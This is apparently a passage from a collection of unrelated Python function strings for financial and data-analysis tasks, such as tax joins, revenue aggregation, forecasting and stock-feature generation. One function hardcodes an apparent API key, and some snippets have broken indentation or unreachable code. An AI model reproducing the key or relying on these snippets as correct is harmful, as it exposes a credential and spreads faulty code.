seq_reservas, df_aux)\n df_other = sub_tax_transfer_pricing_eur_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_transfer_pricing_eur_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_transfer_pricing_eur_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_transfer_pricing_eur_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas, EUR)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing_EUR\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco\n\n return df_fields", "def sort_and_aggregate_periods(budget_model):\n # Calculate total number of months.\n periods = budget_model[\"periods\"] \n total_number_of_months = len(periods) \n budget_model[\"total_number_of_months\"] = total_number_of_months\n\n # Get the reference to the total revenue in the budget model.\n total_revenue = budget_model[\"total_revenue\"]\n\n # Initialize variables used to calculate greatest increase in revenue.\n greatest_increase_revenue = 0\n greatest_increase_name = \"\"\n\n # 
Initialize variables used to calculate greatest decrease in revenue.\n greatest_decrease_revenue = 0\n greatest_decrease_name = \"\"\n\n # Retrieve sort keys for budget model and sort them into chronological order.\n period_keys = periods.keys()\n period_key_list = list(period_keys)\n period_key_list.sort()\n\n # Initialize previous revenue.\n # There is no revenue change for the first period.\n previous_revenue = periods[period_key_list[0]][\"revenue\"]\n total_revenue_change = 0\n\n # Calculate aggregations by processing periods in chronological order.\n for period_key in period_key_list:\n period = periods[period_key]\n total_revenue = total_revenue + period[\"revenue\"]\n\n budget_model[\"total_revenue\"] = total_revenue\n\n revenue = period[\"revenue\"]\n revenue_change = revenue - previous_revenue\n total_revenue_change = total_revenue_change + revenue_change\n \n if revenue_change > greatest_increase_revenue:\n greatest_increase_revenue = revenue_change\n greatest_increase_name = period[\"name\"]\n\n if revenue_change < greatest_decrease_revenue:\n greatest_decrease_revenue = revenue_change\n greatest_decrease_name = period[\"name\"]\n\n previous_revenue = revenue\n\n # Write aggregations to the budget model.\n budget_model[\"greatest_increase\"] = {\"name\": greatest_increase_name, \"revenue\": greatest_increase_revenue}\n budget_model[\"greatest_decrease\"] = {\"name\": greatest_decrease_name, \"revenue\": greatest_decrease_revenue}\n budget_model[\"average_revenue_change\"] = round(total_revenue_change / total_number_of_months, 0)", "def test_lcoe_calc_noscale():\n eqn = None\n # from pvwattsv7 defaults\n data = {'aep': 35188456.00,\n 'capital_cost': 53455000.00,\n 'foc': 360000.00,\n 'voc': 0,\n 'fcr': 0.096}\n true_lcoe = 15.62 # cents/kWh\n true_lcoe *= 10 # $/MWh\n\n eos = EconomiesOfScale(eqn, data)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.001)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.001)\n\n eqn = 1\n eos = EconomiesOfScale(eqn, data)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.001)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.001)\n\n aep = data.pop('aep')\n data['mean_cf'] = 0.201\n data['capacity'] = 20\n eos = EconomiesOfScale(eqn, data)\n assert np.allclose(aep, eos.aep, rtol=0.001)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.002)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.002)", "def monthly_benefit(self):\n \"\"\"Calculate weekly benefit of this company from this day\"\"\"\n total_purchase_price = 0\n total_selling_price = 0\n last_thirty_days = timezone.now() - timedelta(days=30)\n items = self.item_set.filter(status=\"sold\", updated_at__gte=last_thirty_days)\n for item in items:\n total_purchase_price += item.price\n total_selling_price += item.selling_price\n benefit = total_selling_price - total_purchase_price\n return benefit", "def preproc_data(data):\n # Load data manually from Yahoo! 
finance\n\n # Initialize TP Matrix\n # 3-dimension: # of stock * 18 * 18\n # narray\n _TP_matrixs = np.zeros(\n (len(data.ix[stockname]) - 230, 18, 18), dtype=np.bool)\n old = data.ix[stockname]['close'][229]\n TP_matrixs = pd.Panel(_TP_matrixs, items=data.ix[stockname].index[230:])\n label = np.zeros((len(data.ix[stockname]) - 230), dtype=np.float)\n dataindex = 0\n dataset = []\n # Construct TP Matrix\n for TP_matrix in TP_matrixs.iteritems():\n # Extract raw close price of last 230 days\n # pdb.set_trace()\n tp_features = np.zeros((18, 18), dtype=np.bool)\n _list_CP = data.ix[stockname][data.ix[stockname].index <\n TP_matrix[0]]['close'].tolist()\n list_CP = _list_CP[len(_list_CP) - 230: len(_list_CP)]\n close = data.ix[stockname]['close'][dataindex + 230]\n label = (close - old) / old\n old = close\n # col[0, 8] for Upward TP Matrix\n # col[9, 17] for Downward TP Matrix\n for col in range(0, 18):\n D = columns[col][0] - 1\n for row in range(0, 18):\n # For each element of TP Matrix\n for TP in range(D, columns[col][1]):\n # Change ratio of stock on day D with repect to the price\n # at TP\n C_TPD = (list_CP[TP] - list_CP[D]) / list_CP[D]\n if C_TPD * 100 >= rows[row][0] and C_TPD * 100 < rows[row][1]:\n TP_matrix[1][row][col] = True\n tp_features[row][col] = True\n break\n\n sample = DataSet()\n sample.tp_features = tp_features\n sample.labels = label\n dataindex += 1\n dataset.append(sample)\n\n filename = 'data/TP_matrix_' + stockname + '.pkl'\n output = open(filename, 'wb')\n # # Pickle dictionary using protocol 0.\n pickle.dump(TP_matrixs, output)\n output.close()\n return dataset", "def trend_price_down(self):\n raise NotImplementedError()", "def leitner_proportions(df):\n denom = df.shape[0]\n prop_dict = {}\n\n for i in range(1,6):\n df_i = df[df['comfort_level'] == i]\n numer = df_i.shape[0]\n prop_dict[i] = numer / denom\n\n prop_df = pd.DataFrame.from_dict([prop_dict], orient='columns') \n\n prop_df = prop_df.T.rename(columns={0:'proportion'}) \n \n return prop_df", "def get_pred_score(file_name, kpi, start_train, end_train, periods=365):\n # set names for columns in order\n names = ['date', 'handle_time', 'handle_time_forecast',\n 'volume', 'volume_forecast']\n df = pd.read_csv('./data/'+file_name, names=names, header=1, index_col=0)\n\n df['date'] = pd.to_datetime(df['date'])\n df.index = df['date']\n\n # create column for aht\n df['aht'] = df['handle_time']/df['volume']\n df['aht_forecast'] = df['handle_time_forecast']/df['volume_forecast']\n\n # df = df[(df['aht'] > 200) & (df['aht'] < 1500)]\n\n df1 = df.copy()\n\n # create business unit name\n bu = file_name[:6]\n\n # # remove outliers if it helps the model\n # df = remove_outliers(df, bu)\n\n # remove holidays\n df = df[~df.index.isin(h.iloc[:,0].tolist())]\n\n # remove weekends\n df = df[~df.index.weekday.isin([5,6])]\n\n # # plot data in a notebook\n # plot data\n # plot_time_vol(df)\n\n # create training\n df = create_training_data(df, kpi, start_train, end_train)\n\n \n # display(df.head())\n m,future = create_forecast(df, periods=int(periods))\n forecast = m.predict(future)\n\n # # plot forecast in a notebook\n # plot_forecast(forecast)\n\n # set forecast beginning and end date\n f = forecast.copy()\n end_test = df1.index.max()\n f = f[(forecast['ds'] > end_train) & (f['ds'] <= end_test)]\n\n # create validation dataset\n df2 = df1.copy()\n df2['ds'] = pd.to_datetime(df2.index.date) \n\n # set start date of validation data equal to June 1st, 2020 or any other date\n df2 = df2[df2['ds'] > end_train]\n\n # remove 
weekends and holidays from data\n df2 = df2[~df2.index.isin(h.iloc[:,0].tolist())]\n df2 = df2[~df2.index.weekday.isin([5,6])]\n os.makedirs('./preds/'+kpi, exist_ok=True)\n\n future_forecast=forecast[['ds', 'yhat_lower', 'yhat', 'yhat_upper']][forecast['ds']>datetime.datetime.now()]\n\n f[['ds', 'yhat_lower', 'yhat', 'yhat_upper']].to_csv('./preds/'+kpi+'/'+bu+'.csv')\n forecast.to_csv('./preds/analysis/'+kpi+'_'+bu+'.csv')\n\n # Validate test data, it must match for scoring\n mae = evaluate_model(f,df2, kpi, metric='mae')\n\n mae.update({'kpi': kpi, 'start_train':start_train, 'end_train': end_train, 'end_test': end_test}) \n\n curr = pd.read_csv('scores/'+kpi+'_score.csv',index_col=0)\n new = pd.DataFrame(mae, index=[bu])\n\n new.to_csv('./scores/current/'+bu+'_'+kpi+'.csv')\n \n if bu not in curr.index:\n curr = pd.concat([curr, new], 0)\n # create log everytime a score is superceded\n elif new.loc[bu,'prophet'] < curr.loc[bu,'prophet']:\n data = pd.concat([curr.loc[[bu],:],new.loc[[bu],:]],0)\n data.to_csv('./scores/logs/'+bu+'_'+kpi+'_'+datetime.datetime.now()\n .strftime(\"%b %d %Y %H:%M:%S\").replace(' ', '_')+'.csv')\n curr.update(new)\n curr.to_csv('./scores/'+kpi+'_score.csv')\n\n return 'error with metric'\n print('\\ntraining',file_name, 'on', kpi, 'start train:',start_train, \n 'end train:', end_train, 'end_test:', )", "def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1, \r\n test_size=0.2, feature_columns=['open', 'high', 'low', 'close', 'adjclose', 'volume',\r\n 'adjclose_v', 'value_gas', 'value_silver', 'value_gold', 'value_usd',\r\n 'PMI', 'Production', 'New Orders', 'Backlog of Orders',\r\n 'Supplier Deliveries', 'Inventories', 'Customers Inventories',\r\n 'Employment', 'Prices', 'New Export Orders', 'Imports']):\r\n \r\n ind = []\r\n quandl.ApiConfig.api_key = 'hXxA3xSampghdgkVeSJC'\r\n pmi = pd.read_excel(\"pmi.xlsx\", index_col=0)\r\n \r\n \r\n # Cleaning, processing and transforming the gold data\r\n gold = quandl.get(\"WGC/GOLD_DAILY_USD\")\r\n gold.columns = [\"value_gold\"]\r\n \r\n gold_ind = []\r\n gold_data = []\r\n for i in range(1, len(gold.index)):\r\n if(gold.index[i-1].day != gold.index[i].day-1):\r\n for k in range(gold.index[i].day - gold.index[i-1].day):\r\n try:\r\n gold_ind.append(datetime(gold.index[i-1].year, gold.index[i-1].month, gold.index[i-1].day+k))\r\n gold_data.append(gold.value_gold[i-1])\r\n except:\r\n pass\r\n else:\r\n gold_ind.append(gold.index[i-1])\r\n gold_data.append(gold.value_gold[i-1])\r\n \r\n \r\n gold = pd.DataFrame(data = gold_data, index = gold_ind, columns = [\"value_gold\"])\r\n # Cleaning, processing and transforming the USD data \r\n gold_temp = quandl.get(\"WGC/GOLD_DAILY_USD\")\r\n gold_temp.columns = [\"value_gold\"]\r\n \r\n usd_value = quandl.get(\"FRED/TWEXB\")\r\n usd_value.columns = [\"value_usd\"]\r\n data = []\r\n for i in range(len(list(usd_value.value_usd))-1):\r\n for k in range(5):\r\n data.append(list(usd_value.value_usd)[i])\r\n data.append(list(usd_value.value_usd)[-1])\r\n new_usd = pd.DataFrame(data, index=gold_temp.index[gold_temp.index.get_loc('1995-01-04'):gold_temp.index.get_loc('2020-01-01')+1])\r\n new_usd.columns = [\"value_usd\"]\r\n \r\n new_usd_ind = []\r\n new_usd_data = []\r\n for i in range(1, len(new_usd.index)):\r\n if(new_usd.index[i-1].day != new_usd.index[i].day-1):\r\n for k in range(new_usd.index[i].day - new_usd.index[i-1].day):\r\n try:\r\n new_usd_ind.append(datetime(new_usd.index[i-1].year, new_usd.index[i-1].month, new_usd.index[i-1].day+k))\r\n 
new_usd_data.append(new_usd.value_usd[i-1])\r\n except:\r\n pass\r\n else:\r\n new_usd_ind.append(new_usd.index[i-1])\r\n new_usd_data.append(new_usd.value_usd[i-1])\r\n \r\n \r\n new_usd = pd.DataFrame(data = new_usd_data, index = new_usd_ind, columns = [\"value_usd\"])\r\n \r\n # Cleaning, processing and transforming the silver data\r\n silver = quandl.get(\"LBMA/SILVER\")\r\n silver.drop([\"GBP\", \"EURO\"], axis=1, inplace=True)\r\n silver.columns = [\"value_silver\"]\r\n \r\n silver_ind = []\r\n silver_data = []\r\n for i in range(1, len(silver.index)):\r\n if(silver.index[i-1].day != silver.index[i].day-1):\r\n for k in range(silver.index[i].day - silver.index[i-1].day):\r\n try:\r\n silver_ind.append(datetime(silver.index[i-1].year, silver.index[i-1].month, silver.index[i-1].day+k))\r\n silver_data.append(silver.value_silver[i-1])\r\n except:\r\n pass\r\n else:\r\n silver_ind.append(silver.index[i-1])\r\n silver_data.append(silver.value_silver[i-1])\r\n \r\n \r\n silver = pd.DataFrame(data = silver_data, index = silver_ind, columns = [\"value_silver\"])\r\n\r\n # Cleaning, processing and transforming the gas data\r\n \r\n gas = quandl.get(\"FRED/DGASUSGULF\")\r\n gas.columns = [\"value_gas\"]\r\n \r\n gas_ind = []\r\n gas_data = []\r\n for i in range(1, len(gas.index)):\r\n if(gas.index[i-1].day != gas.index[i].day-1):\r\n for k in range(gas.index[i].day - gas.index[i-1].day):\r\n try:\r\n gas_ind.append(datetime(gas.index[i-1].year, gas.index[i-1].month, gas.index[i-1].day+k))\r\n gas_data.append(gas.value_gas[i-1])\r\n except:\r\n pass\r\n else:\r\n gas_ind.append(gas.index[i-1])\r\n gas_data.append(gas.value_gas[i-1])\r\n \r\n \r\n gas = pd.DataFrame(data = gas_data, index = gas_ind, columns = [\"value_gas\"])\r\n # Cleaning, processing and transforming the Volatility data\r\n v_data = si.get_data(\"^VIX\")\r\n v_data.drop([\"ticker\", \"volume\", 'open', 'high', 'low', 'close'], axis=1, inplace=True)\r\n v_data.columns = [\"adjclose_v\"]\r\n \r\n v_data_ind = []\r\n v_data_data = []\r\n for i in range(1, len(v_data.index)):\r\n if(v_data.index[i-1].day != v_data.index[i].day-1):\r\n for k in range(v_data.index[i].day - v_data.index[i-1].day):\r\n try:\r\n v_data_ind.append(datetime(v_data.index[i-1].year, v_data.index[i-1].month, v_data.index[i-1].day+k))\r\n v_data_data.append(v_data.adjclose_v[i-1])\r\n except:\r\n pass\r\n else:\r\n v_data_ind.append(v_data.index[i-1])\r\n v_data_data.append(v_data.adjclose_v[i-1])\r\n \r\n \r\n v_data = pd.DataFrame(data = v_data_data, index = v_data_ind, columns = [\"adjclose_v\"])\r\n \r\n # see if ticker is already a loaded stock from yahoo finance\r\n if isinstance(ticker, str):\r\n # load it from yahoo_fin library\r\n df = si.get_data(ticker)\r\n elif isinstance(ticker, pd.DataFrame):\r\n # already loaded, use it directly\r\n df = ticker\r\n else:\r\n raise TypeError(\"ticker can be either a str or a `pd.DataFrame` instances\")\r\n df_ind = []\r\n df_data = {\"open\":[], \"high\":[], \"low\":[], \"close\":[], \"adjclose\":[], \"volume\":[], \"ticker\":[]}\r\n for i in range(1, len(df.index)):\r\n if(df.index[i-1].day != df.index[i].day-1):\r\n for k in range(df.index[i].day - df.index[i-1].day):\r\n try:\r\n df_ind.append(datetime(df.index[i-1].year, df.index[i-1].month, df.index[i-1].day+k))\r\n df_data[\"open\"].append(df.open[i-1])\r\n df_data[\"high\"].append(df.high[i-1])\r\n df_data[\"low\"].append(df.low[i-1])\r\n df_data[\"close\"].append(df.close[i-1])\r\n df_data[\"adjclose\"].append(df.adjclose[i-1])\r\n 
df_data[\"volume\"].append(df.volume[i-1])\r\n df_data[\"ticker\"].append(df.ticker[i-1])\r\n except:\r\n pass\r\n else:\r\n df_ind.append(df.index[i-1])\r\n df_data[\"open\"].append(df.open[i-1])\r\n df_data[\"high\"].append(df.high[i-1])\r\n df_data[\"low\"].append(df.low[i-1])\r\n df_data[\"close\"].append(df.close[i-1])\r\n df_data[\"adjclose\"].append(df.adjclose[i-1])\r\n df_data[\"volume\"].append(df.volume[i-1])\r\n df_data[\"ticker\"].append(df.ticker[i-1])\r\n df = pd.DataFrame(data = df_data, index = df_ind) \r\n final_df = pd.concat([df, v_data, gas, silver, gold, new_usd, pmi], axis=1, join=\"inner\")\r\n print(final_df.columns)\r\n # this will contain all the elements we want to return from this function\r\n result = {}\r\n # we will also return the original dataframe itself\r\n result['final_df'] = final_df.copy()\r\n # make sure that the passed feature_columns exist in the dataframe\r\n for col in feature_columns:\r\n assert col in final_df.columns, f\"'{col}' does not exist in the dataframe.\"\r\n\r\n if scale:\r\n column_scaler = {}\r\n # scale the data (prices) from 0 to 1\r\n for column in feature_columns:\r\n scaler = preprocessing.MinMaxScaler()\r\n final_df[column] = scaler.fit_transform(np.expand_dims(final_df[column].values, axis=1))\r\n column_scaler[column] = scaler\r\n\r\n # add the MinMaxScaler instances to the result returned\r\n result[\"column_scaler\"] = column_scaler\r\n\r\n # add the target column (label) by shifting by `lookup_step`\r\n final_df['future'] = final_df['adjclose'].shift(-lookup_step)\r\n\r\n # last `lookup_step` columns contains NaN in future column\r\n # get them before droping NaNs\r\n last_sequence = np.array(final_df[feature_columns].tail(lookup_step))\r\n \r\n # drop NaNs\r\n final_df.dropna(inplace=True)\r\n\r\n sequence_data = []\r\n sequences = deque(maxlen=n_steps)\r\n\r\n for entry, target in zip(final_df[feature_columns].values, final_df['future'].values):\r\n sequences.append(entry)\r\n if len(sequences) == n_steps:\r\n sequence_data.append([np.array(sequences), target])\r\n\r\n # get the last sequence by appending the last `n_step` sequence with `lookup_step` sequence\r\n # for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length\r\n # this last_sequence will be used to predict in future dates that are not available in the dataset\r\n last_sequence = list(sequences) + list(last_sequence)\r\n # shift the last sequence by -1\r\n last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())\r\n # add to result\r\n result['last_sequence'] = last_sequence\r\n \r\n # construct the X's and y's\r\n X, y = [], []\r\n for seq, target in sequence_data:\r\n X.append(seq)\r\n y.append(target)\r\n\r\n # convert to numpy arrays\r\n X = np.array(X)\r\n y = np.array(y)\r\n\r\n # reshape X to fit the neural network\r\n X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))\r\n \r\n # split the dataset\r\n result[\"X_train\"], result[\"X_test\"], result[\"y_train\"], result[\"y_test\"] = train_test_split(X, y, \r\n test_size=test_size, shuffle=shuffle)\r\n # return the result\r\n return result", "def assign_labels(data, holding_period=pd.Timedelta(hours=1),\\\n volatility_window=pd.Timedelta(hours=1), factors = [2, 2]):\n\n data = data.assign(tickDirection=_get_direction(data.close),\n closeLag1Hr=_get_ts_lag(data.close, lag=pd.Timedelta(hours=1)))\n data = data.assign(return1Hr=data.closeLag1Hr/data.close - 1).dropna()\n\n # add thresholds and vertical barrier (t1) columns\n data = 
data.assign(threshold=_get_volatility(data.close, delta=volatility_window), \n t1=_get_verticals(data, delta=holding_period)).dropna()\n\n # events are [t1, threshold, side]\n events = data[['t1', 'threshold']]\n events = events.assign(side=pd.Series(1., events.index)) # long only\n\n # get the timestamps for [t1, stop_loss, take_profit]\n touches = _get_horizontals(data, factors)\n # assign labels based on which barrier is hit first\n touches = _get_labels(touches)\n\n # add touches timestamps and label\n data = pd.concat( [data.loc[:, 'vwap':'threshold'], \n touches.loc[:, 't1':'label']], axis=1)\n \n return data", "def getUserHistFeatures(transaction_list, coupon_dict, model_start_date, purchase_date):\n feat_header = [\"NoOfPurchases\", \"DaysSinceLastPurchase\", \"NoOfPurchasesLastweek\", \"NoOfPurchasesLast15Days\", \"NoOfPurchasesLast30Days\", \"NoOfPurchasesLast60Days\", \"NoOfPurchasesLast90Days\", \"NoOfPurchasesLast180Days\", \"DaysSincePrevPurchase\", \"NoOfPurchasesPrevweek\", \"NoOfPurchasesPrev15Days\", \"NoOfPurchasesPrev30Days\", \"NoOfPurchasesPrev60Days\", \"NoOfPurchasesPrev90Days\", \"NoOfPurchasesPrev180Days\"]\n\n # getting number of purchases #\n feat_list = [len(transaction_list)]\n\n # initializing variables #\n purchase_small_area_name_dict = {}\n puchase_date_list = []\n capsule_text_dict = {}\n genre_name_dict = {}\n price_rate_list = []\n catalog_price_list = []\n discount_price_list = []\n dispperiod_list = []\n valid_period_list = []\n usable_date_mon_list = {}\n usable_date_tue_list = {}\n usable_date_wed_list = {}\n usable_date_thu_list = {}\n usable_date_fri_list = {}\n usable_date_sat_list = {}\n usable_date_sun_list = {}\n usable_date_hol_list = {}\n usable_date_before_hol_list = {}\n coupon_large_area_name_dict = {}\n coupon_small_area_name_dict = {}\n coupon_ken_name_dict = {}\n days_since_last_purchase = 9999\n last_week_purchase = 0\n last_fifteendays_purchase = 0\n last_thirtydays_purchase = 0\n last_sixtydays_purchase = 0\n last_nintydays_purchase = 0\n\tlast_oneeightydays_purchase = 0\n\tdays_since_prev_purchase = 9999\n\tprev_week_purchase = 0\n prev_fifteendays_purchase = 0\n prev_thirtydays_purchase = 0\n prev_sixtydays_purchase = 0\n prev_nintydays_purchase = 0\n prev_oneeightydays_purchase = 0\n for transaction in transaction_list:\n diff_days = (model_start_date - datetime.datetime.strptime(transaction['I_DATE'], \"%Y-%m-%d %H:%M:%S\").date()).days\n if diff_days < days_since_last_purchase:\n days_since_last_purchase = diff_days\n if diff_days <= 7:\n last_week_purchase += 1\n if diff_days <= 15:\n last_fifteendays_purchase += 1\n if diff_days <= 30:\n last_thirtydays_purchase += 1\n if diff_days <= 60:\n last_sixtydays_purchase += 1\n if diff_days <= 90:\n last_nintydays_purchase += 1\n\t\tif diff_days <= 180:\n last_oneeightydays_purchase += 1\n\t\t\n\t\tdiff_days = (purchase_date - datetime.datetime.strptime(transaction['I_DATE'], \"%Y-%m-%d %H:%M:%S\").date()).days\n if diff_days < days_since_last_purchase:\n days_since_prev_purchase = diff_days\n if diff_days <= 7:\n prev_week_purchase += 1\n if diff_days <= 15:\n prev_fifteendays_purchase += 1\n if diff_days <= 30:\n prev_thirtydays_purchase += 1\n if diff_days <= 60:\n prev_sixtydays_purchase += 1\n if diff_days <= 90:\n prev_nintydays_purchase += 1\n if diff_days <= 180:\n prev_oneeightydays_purchase += 1\n\n coupon_id_dict = coupon_dict[ transaction['COUPON_ID_hash'] ]\n purchase_small_area_name_dict[transaction['SMALL_AREA_NAME']] = purchase_small_area_name_dict.get( 
transaction['SMALL_AREA_NAME'],0) + 1\n capsule_text_dict[ coupon_id_dict['CAPSULE_TEXT'] ] = capsule_text_dict.get( coupon_id_dict['CAPSULE_TEXT'], 0) + 1\n genre_name_dict[ coupon_id_dict['GENRE_NAME'] ] = genre_name_dict.get( coupon_id_dict['GENRE_NAME'],0 ) + 1\n coupon_large_area_name_dict[ coupon_id_dict['large_area_name'] ] = coupon_large_area_name_dict.get( coupon_id_dict['large_area_name'],0 ) + 1\n coupon_small_area_name_dict[ coupon_id_dict['small_area_name'] ] = coupon_small_area_name_dict.get( coupon_id_dict['small_area_name'],0 ) + 1\n coupon_ken_name_dict[ coupon_id_dict['ken_name'] ] = coupon_ken_name_dict.get( coupon_id_dict['ken_name'],0 ) + 1\n price_rate_list.append( float(coupon_id_dict['PRICE_RATE']) )\n catalog_price_list.append( float(coupon_id_dict['CATALOG_PRICE']) )\n discount_price_list.append( float(coupon_id_dict['DISCOUNT_PRICE']) )\n dispperiod_list.append( float(coupon_id_dict['DISPPERIOD']) )\n if coupon_id_dict['VALIDPERIOD'] not in ('','NA'):\n valid_period_list.append( float(coupon_id_dict['VALIDPERIOD']) )\n if coupon_id_dict['USABLE_DATE_MON'] not in ('','NA'):\n usable_date_mon_list[ float(coupon_id_dict['USABLE_DATE_MON']) ] = usable_date_mon_list.get( float(coupon_id_dict['USABLE_DATE_MON']),0 ) + 1\n usable_date_tue_list[ float(coupon_id_dict['USABLE_DATE_TUE']) ] = usable_date_tue_list.get( float(coupon_id_dict['USABLE_DATE_TUE']),0 ) + 1\n usable_date_wed_list[ float(coupon_id_dict['USABLE_DATE_WED']) ] = usable_date_wed_list.get( float(coupon_id_dict['USABLE_DATE_WED']),0 ) + 1\n usable_date_thu_list[ float(coupon_id_dict['USABLE_DATE_THU']) ] = usable_date_thu_list.get( float(coupon_id_dict['USABLE_DATE_THU']),0 ) + 1\n usable_date_fri_list[ float(coupon_id_dict['USABLE_DATE_FRI']) ] = usable_date_fri_list.get( float(coupon_id_dict['USABLE_DATE_FRI']),0 ) + 1\n usable_date_sat_list[ float(coupon_id_dict['USABLE_DATE_SAT']) ] = usable_date_sat_list.get( float(coupon_id_dict['USABLE_DATE_SAT']),0 ) + 1\n usable_date_sun_list[ float(coupon_id_dict['USABLE_DATE_SUN']) ] = usable_date_sun_list.get( float(coupon_id_dict['USABLE_DATE_SUN']),0 ) + 1\n usable_date_hol_list[ float(coupon_id_dict['USABLE_DATE_HOLIDAY']) ] = usable_date_hol_list.get( float(coupon_id_dict['USABLE_DATE_HOLIDAY']),0 ) + 1\n usable_date_before_hol_list[ float(coupon_id_dict['USABLE_DATE_BEFORE_HOLIDAY']) ] = usable_date_before_hol_list.get( float(coupon_id_dict['USABLE_DATE_BEFORE_HOLIDAY']),0 )+1\n else:\n usable_date_mon_list[3.0] = usable_date_mon_list.get( 3.0,0 ) + 1\n usable_date_tue_list[3.0] = usable_date_tue_list.get( 3.0,0 ) + 1\n usable_date_wed_list[3.0] = usable_date_wed_list.get( 3.0,0 ) + 1\n usable_date_thu_list[3.0] = usable_date_thu_list.get( 3.0,0 ) + 1\n usable_date_fri_list[3.0] = usable_date_fri_list.get( 3.0,0 ) + 1\n usable_date_sat_list[3.0] = usable_date_sat_list.get( 3.0,0 ) + 1\n usable_date_sun_list[3.0] = usable_date_sun_list.get( 3.0,0 ) + 1\n usable_date_hol_list[3.0] = usable_date_hol_list.get( 3.0,0 ) + 1\n usable_date_before_hol_list[3.0] = usable_date_before_hol_list.get( 3.0,0 ) + 1\n\n feat_list.extend([days_since_last_purchase, last_week_purchase, last_fifteendays_purchase, last_thirtydays_purchase, last_sixtydays_purchase, last_nintydays_purchase, last_oneeightydays_purchase, days_since_prev_purchase, prev_week_purchase, prev_fifteendays_purchase, prev_thirtydays_purchase, prev_sixtydays_purchase, prev_nintydays_purchase, prev_oneeightydays_purchase])\n return feat_list, feat_header, [purchase_small_area_name_dict, capsule_text_dict, 
genre_name_dict, coupon_large_area_name_dict, coupon_small_area_name_dict, coupon_ken_name_dict, price_rate_list, catalog_price_list, discount_price_list, dispperiod_list, valid_period_list, usable_date_mon_list, usable_date_tue_list, usable_date_wed_list, usable_date_thu_list, usable_date_fri_list, usable_date_sat_list, usable_date_sun_list, usable_date_hol_list, usable_date_before_hol_list]", "def preprocess(data):\n # Data Preprocessing\n data['GDP_scaled']=preprocessing.scale(data['GDP'])\n data['CLPRB_scaled']=preprocessing.scale(data['CLPRB'])\n data['EMFDB_scaled']=preprocessing.scale(data['EMFDB'])\n data['ENPRP_scaled']=preprocessing.scale(data['ENPRP'])\n data['NGMPB_scaled']=preprocessing.scale(data['NGMPB'])\n data['PAPRB_scaled']=preprocessing.scale(data['PAPRB'])\n data['PCP_scaled']=preprocessing.scale(data['PCP'])\n data['ZNDX_scaled']=preprocessing.scale(data['ZNDX'])\n data['OP_scaled']=preprocessing.scale(data['Nominal Price'])\n data['OP2_scaled']=preprocessing.scale(data['Inflation Adjusted Price'])\n\n return data", "def generate_features(df):\n df_new = pd.DataFrame()\n \n # 6 original features\n df_new['open'] = df['open']\n df_new['open_1'] = df['open'].shift(1)\n df_new['close_1'] = df['close'].shift(1)\n df_new['high_1'] = df['high'].shift(1)\n df_new['low_1'] = df['low'].shift(1)\n df_new['volume_1'] = df['volume'].shift(1)\n \n # 50 original features\n # average price\n df_new['avg_price_5'] = df['close'].rolling(window=5).mean().shift(1)\n df_new['avg_price_30'] = df['close'].rolling(window=21).mean().shift(1)\n df_new['avg_price_90'] = df['close'].rolling(window=63).mean().shift(1)\n df_new['avg_price_365'] = df['close'].rolling(window=252).mean().shift(1)\n \n # average price ratio\n df_new['ratio_avg_price_5_30'] = df_new['avg_price_5'] / df_new['avg_price_30']\n df_new['ratio_avg_price_905_'] = df_new['avg_price_5'] / df_new['avg_price_90']\n df_new['ratio_avg_price_5_365'] = df_new['avg_price_5'] / df_new['avg_price_365']\n df_new['ratio_avg_price_30_90'] = df_new['avg_price_30'] / df_new['avg_price_90']\n df_new['ratio_avg_price_30_365'] = df_new['avg_price_30'] / df_new['avg_price_365']\n df_new['ratio_avg_price_90_365'] = df_new['avg_price_90'] / df_new['avg_price_365'] \n \n \n # average volume\n df_new['avg_volume_5'] = df['volume'].rolling(window=5).mean().shift(1)\n df_new['avg_volume_30'] = df['volume'].rolling(window=21).mean().shift(1)\n df_new['avg_volume_90'] = 